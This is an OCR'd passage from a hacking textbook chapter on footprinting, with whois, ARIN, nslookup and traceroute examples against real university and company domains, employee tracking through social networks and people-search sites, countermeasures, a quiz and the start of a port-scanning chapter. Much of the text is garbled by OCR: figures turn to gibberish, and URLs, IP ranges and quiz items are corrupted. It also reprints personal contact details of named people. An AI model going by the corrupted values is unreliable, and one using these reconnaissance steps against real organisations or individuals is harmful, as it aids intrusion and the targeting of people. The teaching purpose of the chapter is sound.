DNS server IP address, location, point of contact, and more. In fact, of the information gathered at this point the only thing that is noticeably absent is the actual information about the network range, To obtain the network range requires the attacker to visit at least one or more of the Regional Internet Registries (RIRs). which are responsible for management, distribution, and registration of public IP addresses within their respective assigned regions. Currently there are live primary RIRs (see Table 5-2). Because RIRs are important to the process of information gathering and hacking, it is important to define the process of using an R1R in the context of hitp:f ? http://www.smu.edu. When searching for information on the target, it serves some purpose to consider location; earlier research indicated that the host was located in Dallas. Texas. W r ith this piece of information in hand, a query can be run using the ARIN site to obtain still more information about the domain. The hitp:// http://www.arui.net site is shown in Figure 5-10. 120 PART 2 A Technical Overview of Hacking TABLE 5-2 Regional Internet registries. REGIONAL INTERNET REGISTRY REGION OF CONTROL ARIN North and South America A PMC Asia and Pacific | RIPE Europe, Middle East, and parts of Africa LACNIC Latin America and the Caribbean AfriNIC Africa 1 \ R I N sTArviiwHOK HMMFIFR nFliOmrFli PftRTIfjPfcTF prXKIfS- FFFS <. MVOKFS KNCrtMFDGE AFKMJT IK St AR’ H rtfta^lb NbWlOftftH? # ^bfJ-liU^! NOW (CP U LULU LIHUi IPvI IK.*.,: ||m Bf,|lcinLw FbHJIInM R«LHirCf-l L hi-kv Htsm it ■■ kfloi i ■ i . ■ I p ■ i UlW-K,? |l|p-].Yl* Sill* 1 1″ 1 ■-■■■&ik- 1 1 | it-.’-^ r-+<i i IM. Wfcl 1 -4 M” ASH VJtkl FIGURE 5-10 ARIN site. Located in the top-right corner of the Web page is a search box labeled “search whois/’ In this search box, enter the IP address of http: / / http://www.smu.i’du that was recorded earlier and it is also noted in Table 5-1 for reference, The results are of this search are shown in Figure 5-11. You can see that the network range is 129 J ] 9.0.0- 12 9. 119. 2 55 .2 55. With this information, the last piece of the network range puzzle is in place, and a clear picture of the address on the network is built. Network range data provides a critical piece of information for an attacker because it con linns that addresses between 129.119.0.0- 129.119.255.255 a 11 b elo n g to ii t f p : J / w \ \ ‘ iv. smin ‘th i \ th es e a d dress es will be exam in ed in the next step of the process}. With this last piece of information included, the table should now resemble what is shown in Table 5-3. CHAPTER 5 Footprinting Tools and Techniques 1 O’trgtlaroG : 5 □ defter si nethcdisc University C.r&IS; EMU -3 Jbddxess: 61B5 AlEliae City: Dallas 3ti»t»Piri?v: TK Peseta ICade; T5E75-O0DQ Cc^nx r y i US N*cEflft0fit 129.119.0.0 – 129.119.2jji.fSS CIDR: 129. 119. C.ay 16 OrtgniJii; AS 183 2 r JtSlSTS, AS 1*7 6 K« t Manx: : S OU lUtE THUH IV KcHnrtl»: HEI-129-119-0-0-1 Pwmt: wm-i?g-a-O-O-0 NetTypt: Dlritt Assignment ]vM3itvi: : P0WV.CI3.SHD.EDU W*ee3trvev3 SEAS, SHU, EDU Nwe3er\«r : E PONY . £ KU . E DU Updated: ZD 10-02 -ae HAbuscHiLadlc ; JUkbuseHame i 9 JUbusePhoBe : I50J-ARIH InJoEWwaost Security Offiw +1-2 H-TSS-7321 FIGURE 5-11 ARIN results. HKOCJiaiulle : NDC1961-ARIH FWOCHMne i Necuorfc Operations Center RWOCPh&KlSi +1-.314-168-4662 RTeehHatidie: BBMlT-AELCH RTeeHHiiane : He ik 1 e , F. Bsc uce RTachFlrcn* ; +1-2 1 4 £9-3 471 J : rbiHraai 1 . snvu.edu Or irAbMse Handle: ESH-ARIH Or^JUauseNarae : lnfaetaati6!i Security Of fit* Or (jib us* P Hose : + 1 -,2 14-7 6B- 7 3 2 1 OrgAJPurc Eras 1 1 : obuseG on™ , c du OrgNOCDajfudle: HOCl 9 61-HBI M OcflttOCHw^f; HctuoEk Qpacntlons Center OcgHOCPhoue : +1-S 1 4-7 68-4 662 OrflNOCEtuai 1 : nocd stun . edu table s-3 Final whois findings. DOMAIN NAME IP ADDRESS NETWORK RANGE DNS SERVERS POINT OF CONTACT http://www.smu.edu 129.119.64.10 129.119.0.0- 129.119.64.10 Bruce Meikl 129.119.255.255 Automatic Registrar Query The manual method of obtaining network range information is effective, but it does have the drawback of taking a significant amount of time. You can speed up the process using automated methods to gather this informal ion faster than can be done manually. Several Web sites are dedicated to providing this information in a consolidated view. Numerous Web sites are also dedicated to providing network range information automatically. 122 PART 2 A Technical Overview of Hacking FIGURE 5-12 Dniin Nut: 5MU,tW Domamtools name query. Re ci stteoit : Siyurhein Hethodiat UnlUetSiiy 61B5 Air 1 IBS PllVt fltJi :-‘Ioui MlU, TX 75275-0262 1JMITZT’ STATE!; Msiminriatuve Contact: ).:.-.:.: R. Killer Diiertor of TeleroMuniciationa Sfrwihtrii Hcthadiat UeiUtlEfiW 61B5 Airline: El- 4lb FlOOt 41 1.1?., TV 75275 nr-62 UHITET- 5TATE5 (214| 76B-4225 |rmillaf^MTiu.edu T«c-]mical Contact: Se. IrntA Engineer iouchrrn Hrthodiat University S1*S At rlint £■!- taJlUj TX 7i2«-«262 ITMJTE& STATES (31411 7»-34?j, prawns. siD.rtiij SWS.SJWh ECU KfBHTT, SHtLEI’iU EfOWTf. &H0.EL-U J29.U9.64.10 125. 119. t-1 8 i2e.ni2.i«2 L iaa Iism re-cord activated: 31-Auer- twtiln record lut tfljd ti4: F*b Caaaiis skpiecj; 31-Jul-2QlO Some of the more common or popular destinations for searches of this type include the following: h t ip.7/ w ww, sam spade, o rjj h t fp: ii iv ww, t ienvhois. com h t tp’J / iv ww, a flw Jio is. com http://geektools. com h t tp’J / iv ww, aU- } i e.t too h. com h t tp’J / iv ww. sn j a rtwhois, com http’Ji iv ww, cfrt&s f ujfjf com h t tp’J / iv ww. snmsparie. o h t fp: / / ivhoi s, domain tools. i:o m A point to remember is that no matter what tool the professional prefers, the goal is to obtain registrar information. As an example. Figure 5-12 shows the results of http’Ji u? hois, dam am tools, com whe n h ttpi/f w ww. sm u. edn was q u e ri ed lb r i n form a 1 i on . Underlying all these tools is a tool known as whois, which is software designed to query Lhe databases that hold registration information. Whois is a utility that has been specifically designed to interrogate the Internet domain name administration system and return the domain ownership, address^ location, phone number, and other detEiils Eibouta specified CHAPTER 5 Footprinting Tools and Technique 123 domain name. The accessibility of this tool depends on the operating system in use. For Linux users, the tool is just a command prompt away; Windows users have to locate ti Windows-compatible version and download it or use a Web site that provides the service, Whois The Whois protocol was designed to query databases to look up and identify the registrant of a domain name. IV ho is information contains the name, address, and phone number of the administrative, billing, and technical contacts of the domain name. It is primarily used to verify whether a domain name i> available or whether it has been registered. The following is an example of the whois info for cisco.com Registrant: Cisco Technology Inc. 170 W. Tasman Drive San Jose, CA 95134 US Domain Name: CISC0.COM Administrative Contact: Info Sec 170 W. Tasman Drive San Jose, CA 95134 408-527-3842 fax: 408-526-4575 Te c h n ic a 1 C ont ac t: Network Services 170 W. Tasman Drive San Jose, CA 95134 US 408-527-922 3 fax: 408-526-73 73 Record expires on 15-May-2f)ll. Record created on 14 -May- 1987* Domain servers in listed order: NS1.CISC0.COM 128.107.241.185 NS2.CISCO.COM 64.102.2 55.44 | > NOTE Whois has also been used by law enforcement to gain information useful In prosecuting criminal activity such as trademark infringement By looking at this ex n mple it is possible to gain some information about the domain name and the department that is responsible for managing it which H in this case, is the Infosec team. Additionally you will note that we have phone numbers and DNS info for the domain as well, not to mention a physical address that we can look up using Google Earth. 124 PART 2 A Technical Overview of Hacking Nslookup Nslookup is a program to query Internet domain name servers. Both UNIX and Windows eome with an Nslookup client. If Nslookup is given an IP address or a fully qualified domain name (FQDN), it will look up and show the corresponding IP address. Nslookup can be used to do the following: • Find addition ei I IP addresses if authoritative DNS is known from Whois • List the MX I mail) server for a specific range of IP addresses Extracting Information with NSLOOKUP: nslookup set type = in x cisco .eo in Server: x.x.x.x Address: x.x.x.xU 5 3 Non-authoritative answer: cisco.com mail exchanger = 10 smtp5.cisco.com. cisco.com mail exchanger = 10 smtp4.cisco.com. cisco.com mail exchanger = 10 smtpl .cisco.com. cisco.com mail exchanger = 10 smtp2.cisco.com. Authoritative answers can be found from: cisco.com nameserver = nsl .cisco.com. cisco.com nameserver = ns2.cisco.com. cisco.com nameserver = ns5.cisco.com. cisco.com nameserver s ns4.cisco.com. nsl .cisco.com internet address = 216.239. 3 2. 10 ns2.cisco.com internet address = 216.239. .34. 10 ns3.cisco.com internet address = 216.239.36.10 ns4.cisco.com internet address = 2 16. 2 39. 3 R. 10 Looking at these results you can see several pieces of information that would be useful, including the addresses of nam eser vers and mail exchangers. The nam eser vers represent the systems used to host DNS while the mail exchangers represent the addresses of servers used to process mail for the domain. The addresses should be recorded for later scanning and vulnerability checking. Internet Assigned Numbers Authority (IANA) According to http://www.iana.org, “The Internet Assigned Numbers Authority (IANA’S is responsible for the global coordination of the DNS root, IP addressing, and other Internet protocol resources.” Based on this information, IANA is a good starting point to learn more CHAPTER 5 Footp riming Tools and Techniques 125 DNS 101 Nslookup works with and queries the DNS, which is a hierarchical naming system for servers, computers, and other resources connected to the Internet. This system associates information such as IP address to the name of the resource itself. Once this association is present, it is possible to translate names of systems meaning! ul to humans into the IP addresses associated with networking equipment for the purpose of locating these devices. DNS can he thought of much in the same way as looking up phone numbers or names in a phonebook. First, a phonebook system is hierarchical with different phonebooks for different regions and within those phonebooks, different area codes. Second, in the phonebook you have names and the phone numbers associated with them, along with other information such as physical addresses, much like DNS. When looking up an individual you simply look up their name and see what their phone number is and call them. In DNS this would be called a forward lookup. You also can call Information and give a number and they can do a reverse lookup w r iere they take the phone number and look up the name associated with it. Eibout domain ownership Eiiid to determine registration information. A good place to start is at the Root Zone Database page, which lists Bill top-level domains, including .com, .edu H .org. Bind so on. It also shows two-character country codes. Refer to the example shown in Figure 5-7. For example, for a quick look at information on an .edu domain such as Villa nova University, you could start at http://wwwAana.org/ domains/root/ dbfedu.htm i The top-level domain for .edu sites is h t tp:/ 1 www. educa use. edu/ edudo main (and the whois server: whoin .t’d uni 1 1. sr. t’d it). Th e results of this search can be seen in figure 5-13, e EDUCAUSEJ .edu ADMINISTRATION ^/Transforming Education Through Inform tb on Technologies jsJj Home Page fltsrueri a ttew Daman Manage Yixj Dcr 0ifi f M&slt V*as L’juH-ij .rd. ft-U-‘, .edu FAQ Whais Lookup O -sip W Contact Us FIGURE 5-T3 EDU whois search result. Who is Lookup VLl_ajlO’/i L’jjlVi f s 1<L v 300 Ljinc ait «-r Jlv«ti nilu^lt, fX 1MB inilfID suits 71 11 an air a Otni.tr art icy 900 LuBEAiru Avbsuu rrrjlTID StAl is h.* iti » o it t r IJv l i 1 mnava.. «du 126 PART 2 A Technical Overview of Hacking The same type of search can be performed ei gainst a .com domain such as http:f fwww Jiackthestack.com .The results of ill Ls seiirch are shown here: Domain Name: IIACKTIIESTACK.COM Reseller: DomainsRus Created on: 2 7 Jun 2006 11 : 15 : 3 7 EST Expires on: 27Jnn 2(118 11:15:47 EST Record last updated on: U May 20QSI G 7: IK: 10 EST Status: ACTIVE Owner, Administrative C out tic t, Technical Contact. Billing Con I act: Superior Solutions Inc Network Administrator (ID0005 5881) PO Box 1722 Freeport, TX 77542 United States Phone: +979,8765309 Email: Domain servers in listed order: NS1-PLANETD0MAIN.COM NS2.PLANETD0MAIN.COM Notice that these results also include a physical address along with all the other domain information. It would be possible to take the physical address provided and enter it into any of the commonly available mapping tools and gain information on the proximity of this address to the actual company. Now that the domain administrator is known, the next logical step in the process could be to determine a valid network range. Determining a Network Range One of the missions of the IAN A is to delegate Internet resources to RIRs. The RIRs further delegate resources as needed to customers, who include Internet service providers {ISPs) and end-user organizations. The RIRs are organizations responsible for control of IPv4 and IPv6 addresses within specific regions of the world. The five RIRs are as follows: American Registry for Internet Numbers (ARIN) — North America and parts of the Caribbean • RIPE Network Coordination Centre (RIPE NCQ— Europe, the Middle East f and Central Asia • Asia-Pacific Network Information Centre (APNIQ — Asia and the Pacific region CHAPTER 5 Footprinting Tools and Technique 127 Latin American and Caribbean Internet Addresses Registry (LACNIC) — Latin America and parts of the Caribbean region • African Network Information Centre (AfriNlQ — Africa Per standards* each R[R must maintain point-of-contact (POC) information and IP address, assignment. As an example, if the IP address 202. 131,9 5. 30 corresponding to http://wwwJiackthestack.com is entered, the following response is returned from ARIN: OrgName; Asia Pacific Network Information Centre OrgID: APNIC Address: PO Box 2131 City: Milton StateProv: QLD PostalCode: 4064 Country: AO Refe rra I S er ver : wh ois : / / wh ois . ap n ic , net NetRange: 202,0.0,0-203,2 55.255.25 5 CIDR: 202,0.0.0/7 NetName: APNIC -CIDR-RLK NetHandle: NET-2 02 -0-0-0-1 Take note of the range of 202.0.0,0 to 203.255.25 5,25 5. This is the range of IP addresses assigned to the network hosting the http: f fwww.hackthestack.com Web site. Many other Web sites can he used to mine this same type of data. Some of them include the following: • http:f /www. all-net tools, com • ht tp : / / w w w. Sm a rt wh ois. com • Ji j£ tp : / / w w w. alhvh ois. con 2 • h t tp : / / w w w. Dnss t itff. com ■ ht tp: / / w w w. Sam spade, org • The next section shows how a hacker can help determine the true location of the domain and IP addresses previously discovered. Trace route Trace route is a software program used to determine the path a data packet traverses to get to a specific IP address. Traceroute, which is one of the easiest ways to identify the path to a targeted Web site, is available on both UNIX and Windows ope tei ting systems. In Windows operating systems, the command is known as tracer t. Regardless of the name the program display s h tracer t displays the list of routers on a path to a network destination by using Time to Live (TTL) time-outs and Internet control message protocol (TCMP) error messages. This command will not work from a DOS prompt. 128 PART 2 A Technical Overview of Hacking C:\tracert http://www.cisco.com Tracing route to arin.net [202. 131 .95 .30] 1 I ms J ms 1 ms 192. 123.254 2 12 ms 15 ms 11 ms adsl-G9-151-Z23-2S4.dsl.hstritx.swbeU.net [G9. 151 .223.254] 3 12 ms 12 ms 12 ms 151 . 164. 244. 193 4 11 ms 11 ms 11 ms bbl-g14-€.hstntx. sbcglobal . net [ 151 . 164. 92.2(94] 5 48 ms 51 ms 48 ms 151 . 164 . 98.61 6 46 ms 48 ms 48 ms gi1–l.wiia4.net.reach.com [206.223 . 123 . 1 1] 7 49 ms 5© ms 48 ms i -{D-0-O.wil-coreO2.bi . reach.com [202.84.251.233] S 196 ms 195 ms 196 ms i- 15-0. sydp-core02 . bx, reach . com [202.84.140.37] 9 204 ms 202 ms 203 ms unknown.net.reach.com [134.159.131.110] 10 197 ms 197 ms 200 ms ssg550-l-rl-l.network.netregistry.net [202. 124.240.66] 11 200 ms 227 ms 197 ms forward. plane tdoma i.n . com [202.131.95.30] Analyzing these results, it is possible to get better look at what trace route is providing. Traceroute functions by sending out a packet to a destination with the TTL set to 1 . When the packet encounters the first router in the path to the destination it decrements the TTL by 1 . in this case setting the value to 0, which results in the packet being discarded and a message being sent back to the original sender. This response is recorded and a new packet is sent out with aTTLof 2. This packet will make it Ihrough the first router* then will stop at the next router in the path. This second router then sends an error message back to the originating host much like the original router. Traceroute continues to do this over and over until a packet finally reaches the target host, or until a host is determined to be unreachable. In the process, traceroute records the time it took for each packet to travel round trip to each router. It is through this process that a map can be drawn of the path to the final destination. In the above results you can literally see the IP address, name, and the Lime it took to reach each host and return a response giving a clear picture of the path to connect to the remote host and the time to do so. The next -to- 1 a st hop before the Web site will often be the organization’s edge device, such as a router or firewall. However, you cannot always rely on this Information because security-minded organizations tend to limit the ability to perform traceroutes into their networks. Tracking an Organization’s Employees You can use the Web to find a wealth of information about a particular organization that can be used to plan a later attack. The techniques so far have gathered information on the financial health of a company, its infrastructure, and other similar information CHAPTER 5 Footprinting Tools and Technique that can be used In build a picture ol” the target. Of all the information gathered so far, there is one area that has yet to be explored: the human element. Gathering information on human beings is something that until recently has not been easy, but now with the ever-increasing amount of information people themselves put online, the task has become easier. The growing usage of social networking such as Facebook, My Space, and Twitter have all served to provide information that can he searched and tracked back to an individual, According to Harris Interactive for CareerBuilder.com, 45 percent of employers questioned are using social networks to screen job candidates I and so are attackers). Information that can be uncovered online can include the following: • Posted photographs or information ■ Posted c o nte n t abo ut drill kin g or drug u sa ge • Posting derogatory information about previous employers, coworkers, or clients • Discriminatory comments or fabricated qualifications • The motivation behind providing examples of such information is to give an idea of what the Eiverage user of social networking puts on the Internet. An attacker wanting to gain a sense of a company can search social networks and find individuals who work for the target and engage in idle gossip about their work, A single employee of a company talking too liberally about goings on at work can provide another layer of valuable insight that can be used to pian an attack. Although disgruntled employees deiinitely are a security threat, there are other less ominous actions that a human can take trmt will affect security. A single employee can be a source of information leakage that could result in damaging information leaks or other security threats. Consider the fact that it is not uncommon to find an employee posting information on blogs. Facebook, Twitter, or other locations that can be publicly accessed. Other employees have been known to get upset and set up what is known as a “sucks” domain, In which varying degrees of derogatory information are posted. Some of the sites that hackers have been known to review to obtain more information about a target include the following: One of the reasons why social networking is such an effective tool is that the typical user of these services does not think of the information that is being shared. Individuals using social networks have been known to post all sorts of activities, such as dating and clubbing, to information about bathroom and eating habits. Perhaps the best example of how loosely people share information in social networks is Twitter. A cursory look at Twitter quickly reveals a treasure trove of information about most users on the service. Keep in mind that the average user of Twitter does not typically use the features in the application to keep their postings private, either because they don’t krow about these settings or because they simply want to feel important by broadcasting their thoughts to anyone who might listen. 130 PART 2 A Technical Overview of Hacking • Blogs • Per son ei I pages on a social networking site: Face book, MySpace, Linkedln. Plaxo, Twitter, Sucks domains • People-tracking sites • Each of these sites can be examined tor nntnes h e-mail addresses, addresses, phone numbers, photographs, and so on. As an example, consider the Peoples Dirt site ( h ttp:f / ww w.peoplesdirt. com ) t which is shown in Figure 5-14. This site is designed to allow individuals to make anonymous posts about other individuals or organizations. Any disgruntled person can post libelous or hate-filled messages. Web logs, or blogs, are a good source for information about a targeted company if one can be located. Anyone can go to one of the many free b logging sites and set up a blog on which to post un filtered comments and observations. As such, attackers have found them a valuable source of information. IIow r ever, one of the bigger problems with blogs for the attacker is finding a blog that contains the information that may be useful. Consider the fact that a tremendous amount of blogs exist, and of those only a small amount are ever updated; the rest are simply ei ban denied by the owners. Wading into the sea of blogs on the Internet is a challenge^ but using a site such as h ttp: i / w w w. bl\< ;jsi \ i nh vitff’n j < J . t -om will allow for the searches of many blogs quickly. Additional sites such as httpi/fwww iWinhcvtn and http://www.spock.com allow users to search personal pages such as Facebook and My Space for specific content. FIGURE 5-14 Peoples Dirt Web site. CtjFW? *O.Rfl9irter <D Login Click Mere to refresh numbers TOPICS POST? LfliiT TOBT ® Pci HewUssis Kuw botm*t arvd *tsr snonvnous. 1 1 MS potff © Peopled iit.com in tli? ihws Chct< ierp to lee pea plea dirt, cum in the new 7 13 Ho PMtS © Click hent to view ycajr *tsle 55794 tic pDSti © PinnaylwMiia Click ftere 1* view *«ir start 505 3831 tic postl © Virgin!* Click >iei^ 1* vie* ftmr *to!e 4S4 2(448 NO pIKti © telnet of CclumtiB CRde here to view D.C. L29 61b HQ fftatf © Hew y^rti Click it’t (d •> c*ir itaie 19 22 No pt-ils © Click tier* Id Vie+t f air ttale SO 2Q tic pos1s CHAPTERS Footprinting Tools and Techniques 131 Z ABASE ARCH FIGURE 5-15 Zabasearch, Pubik Information Recite Sn mm nw: < l too l$k 1 4 toolsie Wis it w r

LENNY TOOLSIE -Detailed Background R sport
CgcnpnlwiKiw Report Cirwrnl Rfleoffls Utusl Cwflrt iKwm#lwi»
Find LENNY TOOLSIE

6*1 Curort Ptisn? in$Address. L TOOLSIE ■ 4 Free Listings Chwk w^]» 8 far: TOOLSIE . LEMV . LEWY TOOJSg lews » m86aa& to LENWY TOOLSff E.mtl Tto Fan khaw VJhati Yat/ia Saino S^aidhad on cha tni*irmi Cnjalt- > PubliC-fitMEd TO OLSIE mm m i-jt,a Get Big; &■ I c^*m Lrmi.m**» o H n* 202 ROCK RD Mg ^htoihsfld L FiOf^pj Rtyan MaiiC’inn ui^inni Ba&ortxnd Check on ,h;:x rao. LENNOX TOQLSIE a.™ ^ una . • lEte^’i JO* KELLOGG Dfi Nf^hortatut IFrpasity Re Mil h«.*m r^>j ww BaArrQund Ched< on LFWOX TOOLSIE L E NNO% TQ OLSIE <m i-ss-j Itr- ‘ ‘ cn..^,, f.-..i …. ,. 770 SIVEfi’ SPPW8S BLVX Naiiftbchcod & Pr-oirerty P apart mow* WICHITA. KS r>73IJ f3taitt**-fltlT Ctrfrm Cuinnl Phw t, Addrtv BrektroLnd Check on LEWCK TQQlSIE LENNOX TO OLSIE im dm ims Get ttie E>1 r+i tmn a<**« imn 9007 HARRY 3T NtnrfitothppJ I, P^Jt’rtY Pfpul n.wncnini-crifaan WICHITA. KS 87307 Cgrir^ Crn-H Plum **ddnw Lto*enxj,U Check on LEWOK TOOLSIE Sucks domains Eire domain names that have the word “sucks 1 ‘ in the name (for example, http://www.wiihnnrlsiuks.org and http://www.paifpahucks.com}. These are sites in which individuals have posted unflattering content about the targeted company due to a perceived slight or wrong. An interesting note about sucks sites is that although such sites may seem wrong or downright illegal, the comments posted on them have been frequently protected under free speech laws. Such sites are usually taken down, however, partly due to the domain name not actually being used or the domain simply being “parked” l although if the site is active and noncommercial, the courts have sometimes ruled such sites Legal). Finally, another way of gaining information about an individual is to access sites that gather or aggregate information for easy retrieval. One such site is http://www.zabasearch.com, of wmich an example search is shown in Figure S-l Another similar site to 2 aba search is http://www.spokeo.com, which accumulates data from many sources such as Facebook, public records, photos, and other sources that can be searched to build a picture of an individual. NOTE E^en job search sites such as Monster.com and Careerbuilder.com are prime targets for information. If an organization uses online job sites, pay close attention to what type of information is being given away about the company’s technology. 132 PART 2 A Technical Overview of Hacking FIGURE 5-16 Windows Remote Desktop Web connection. Windows Remote Desktop Web Connection Type ?ht flamt <rf &it imrwte computer you want to ure, fetcct the- *cxr«i sec for your EoraiccbwL and Tfacti clck When the eemettjon p*ge opens, you can jdd J So your FivocJfi s Ft* risy cornecton lo ibf ifflfit c«iDf*ut#r. Siac Zl □ Scwi logon nfonnatiwi for flus ‘.» »: I. 1 j Exploiting Insecure Applications Many applications were not built with security in mind. Insecure applications such as Telnet, File Transport Protocol (FTP], the V commands, Post Office Protocol {POP), Hypertext Transfer Protocol (HTTP), and Simple Network Management Protocol (SMMP) operate without encryption. What adds to the problem is that some organizations even inadvertently put this information on the Web, As an example, a simple search engine query for terminal service Web access TSWCB (another name for Remote Desktop) returns dozens of hits that appear similar to Figure 5-16. This application is designed to allow users to connect to a work or home computer and access files just as if physically sitting in front of the computer The problem with locating this information online is that an attacker can use the information to get further details about the organization or even break in more quickly in some cases. NOTE Organizations that are more ambitious should consider attempting to footprint themselves to see firsthand what types of information are currently in the public space and whether such information is potentially damaging. Using Basic Countermeasures Footprinting can be a very powerful tool in the hands of an attacker who has the knowledge and patience to ferret out the information that is available about any entity online. But although footprinting is a powerful tool, there are some countermeasures that can lessen the impact to varying degrees. The following shows some of the defenses that can be used to thwart footprinting: Web site — Any organization should take a long hard look at the information available on the company Web site and determine whether it might be useful to an attacker. Any potentially sensitive or restricted information should be removed as soon as possible, along with any unnecessary information. CHAPTER 5 Footprinting Tools and Technique 133 Special consideration should be given to information such as e-mail addresses, phone numbers, and employee names. Access to such information should be limited to only those who require it. Additionally, the applications, programs, and protocols used by a company should be nondescript to avoid revealing the nature of services or the environment, Google hacking — This attack can be thwarted to a high degree by sanitizing information that is available publicly wherever possible. Sensitive information should not be posted in any location, either linked or unlinked, that can be accessed by a search engine as the public locations of a Web server tend to be. Job listings — When possible, use third- party companies for sensitive jobs so the company is unknown to all but approved applicants. If third-party job sites are used, the job Listing should be as generic as possible, and care should be taken not to list specific versions of applications or programs. Consider carefully crafting job postings to reveal less about the IT infrastructure. • Domain information — Always ensure that domain registration data is kept as generic as possible, and that specifics such as names, phone numbers, and the like are avoided. If possible, employ any one of the commonly available proxy services to block the access of sensitive domain data. An example of one such service is shown in Figure 5-17. Employee posting — Be especially vigilant about information leaks generated by well-intentioned employees who may post information in technical forums or discussion groups that may be too detailed, More important, be on the lookout for employees who may be disgruntled and who may release sensitive data or information that can be viewed or accessed publicly. It is not uncommon for information leakage to occur around events such as layoffs or mergers. ^Domains by proxy; i FHRM.TE HltlSltHlDK’ Your identity & m*Hf/ busmen but OUJy HOME MTACM)U(! «0 WilVIASF PF.-.IVfWIC’^ MM A&UTUS SWWtT LCdltSSLfS Welcome to Domains By Proxy*! Outlay Y«ir domain Mine- iai four personal iilcrairjiiui. Did yau kritr* Ihil it* ttth dOmani niml you nfl-ndiv. Miry wir ■ diivnlitH a. JiMin* ■ tan find (urtyoui nam a, lunie &Jci*&£, fmom number and Email andraea^ The taw naquijs th«t Dro aersoflal > nrarrnHwi ju$tvna* win* every
domain you rag steioe TiadE public In She p ¥rtKHS ,F database. Vmir
nliiriflKCBfrte in stwiitv available – and vulnerable – 1o sp amnrwrs,

An itniv il ih ft’s j scNninn: I ioiii,bm& ffy Pi

e-etttn.g a Private
Registration will;

L Blorj dCTpaln-fE ialerj sp-arn
L Prev*rf1 hii HiH\ fi & ilalfteri
l End data mimng
Q Prated vriur ran iy’i pr«Mty
L fifio. mwie.1

t^aiah n is- EWcieucc!

Aii n fliw Qi aai PWiKKvPToanet!
fit- ffpig ,■! SSt r>iTfficitlr?
i <n .1:111: | .-.J,; – ■ \ir.~i

FIGURE 5-17

Domains by proxy.

134 PART 2 A Technical Overview of Hacking

[> NOTE

A good proactive step is for a
company to research the options to
block a search engine’s bots from
indexing a site. One of the best
examples of code that tells search
engines how a site can be indexed
is the robots.txt file. The robots.txt
file can be configured to block the
areas a search engine looks, but
it can also be accessed by a hacker
that can open the file in any
commonly available text editor.

• Insecure applications — Make it a point to regularly scan
search engines to see whether links to private services
are available (Terminal Server, Outlook Web App [OWA],
virtual private networks [VPNs], and so on). Telnet and
FTP have similar security problems because each allows
anonymous logon and passwords in clear text. Consider
replacing such Eip plications with a more secure application
such as SSI I or comparable wherever possible or feasible.

Securing DNS — Sanitize DNS registration and contact
information to be as generic as possible (for example,
“Web Services Manager,” main compel ny phone number
5 5 5 – 12 12, techs i tpport@ hack thestack. com ) < II a ve two
DNS servers — one internal and one external in the
demilitarized zone (DMZ), The external DNS should
contain only resource records of the DMZ hosts, not
the internal hosts. For additional safety, do not allow
zone transfers to any IP address.

CHAPTER 5 Footprinting Tools and Technique

135

CHAPTER SUMMARY

This chapter covered the process of fool print Lag, or passively obtaining inform a Lion
about a target. In iLs most basic form, footprinting is simply inibrniation gathering that is
performed carefully to avoid detection completely, or for lis long as possible, while always
trying to maintain n stealthy profile. I llimalery, the goal of footprinting is lo gainer lis
much information as- possible about the intended victim without giving away intentions
or even the presence of the attacker involved.

If done carefully and methodically, footprinting can reveal large a mounts of information
about a target. The process, when complete, will yield a better picture of the intended
victim. In most situations, a large amount of lime will be spent performing this process
with relatively lesser amounts of time being spent in the actual hacking phase. Patience
In the information gathering phase is a valuable skill to learn alongside how lo actually
gain the Information, IdeaUy, information gathered from a well-planned and executed
footprinting process wilJ make the hacking process more effective.

Remember, footprinting includes gathering in forma I ion from a diverse group of sources
and locations. Common sources of information used in the footprinting phase include
company Web sites, financial reports, fin ogle searches, social networks, and other simitar
technologies. Attackers can and will review any source of information that can till on I
the picture of the victim more than il would be otherwise.

KEY CONCEPTS AND TERMS

Footprinting
Insecure applications
Internet Archive
Internet Assigned Numbers

Nslookup

Regional Internet Registries

Authority (I AN A)

{RIRs}
Social networking site
Traceroute
Whois

136 PART 2 A Technical Overview of Hacking

CHAPTER 5 ASSESSMENT

1 . What is the best description of foot printing?

A. t’ashLVL- information ^citherini;

B. Active information gathering

C Actively mapping an organization’s

vulnerabilities
D. Lsing vulnerability scanners to map

an organization

1. Which of the following is the best example
of passive information gathering?

A. Reviewing job listings posted by the
targeted company

B. Fort scanning the targeted company

C. t idling I he compel uy tind asking questions

11 Driving around the targeted company
connecting to open wireless connections

1. Which of the following is not typically

a Web resource used n> footprint a company?

A, Company Web site

B. job search sites
C Internet Archive

D. Phonebooks

1. It’ you were looking lor information about
a company’s financial history you would
want to check the database.
• Which of the following is the best description
of the intitle tag?’

• A. Instructs Google to look in the I; Hi.
of a specific site

B. Instructs Google to ignore words in the title
of a specific document

C Instructs Google to search for a term within

the title of a document
\1 instructs Google to search a specific 1 Hi-

fi. J f you need to find a domain that is located
in Canada, the best KIK lo check tirsl would
be .

1. You have been asked to look up a domain
that is located in Europe. Which KIK should
you examine first?

A. LAC NIC
Jri. APMlC

C. RIPE
11 AKIN

&. SNMP uses encryption and Is therefore
a secure program.

A. “True

B. False

1. You need lo determine the path to a specific
IP address. Which of the following tools Is
the best to use?

A. J ANA

B. Nslookup

C. Who is

D. Trace route

1. During the footprinting process social networking
sites can be used to find out about employees
and look for technology policies and practices.

A. True
15. h’alse

Port Scanning

FOOTPRINTS IS A PROCESS that passively gathers information about
a target from many diverse sources. The goal of footprinting is to learn
about a target system prior to launching an attack. If footprinting
is performed patiently and thoroughly, a very detailed picture of a victim
can be ach ieved, but that still ‘eaves this question: What’s next? If all this
information is gathered up, organized, and placed before the attacker,
how can it be acted upon? This next step, port scanning, is an active process
that gathers information in more detail than footprinting can.

After the target has been analyzed and all relevant information organized,
port scanning can take place. The goal of performing port scanning is to
identify open and closed ports as well as the services running on a given
system. Port scanning forms a critical step in the hacking process because
the hacker needs to identify what services are present and running on a
target system prior to initiating an effective attack. Port scanning also helps
to determine the course of action in future steps because once the nature
of running services is identified, the correct tools can be selected from the
hacker’s toolbox. For example, a hacker may have a tool to target a file
transfer service such as the Washington University file transfer program
(WUFTP). However, if the victim is running Microsoft File Transfer Protocol
(FTP) program, the exploit tool will be incompatible. Once a port scan has
been thoroughly performed, the hacker can then move on to mapping
the network and looking for vulnerabilities that can be exploited.

Chapter 6 Topics

This chapter covers the following topics and concepts:

• How to determining the network range

• How to identify active machines

• How to map open ports

• What Operating System (OS) fingerprinting is

• How to map the network

• How to analyze the results

Chapter fi Goals

When you complete this chapter, you will be able to:

• Define port scanning

» Describe common port scanning techniques

• List common Nmap switches

• Describe why User Datagram Protocol (UDP) is harder to scan
than Transmission Control Protocol (TCP)
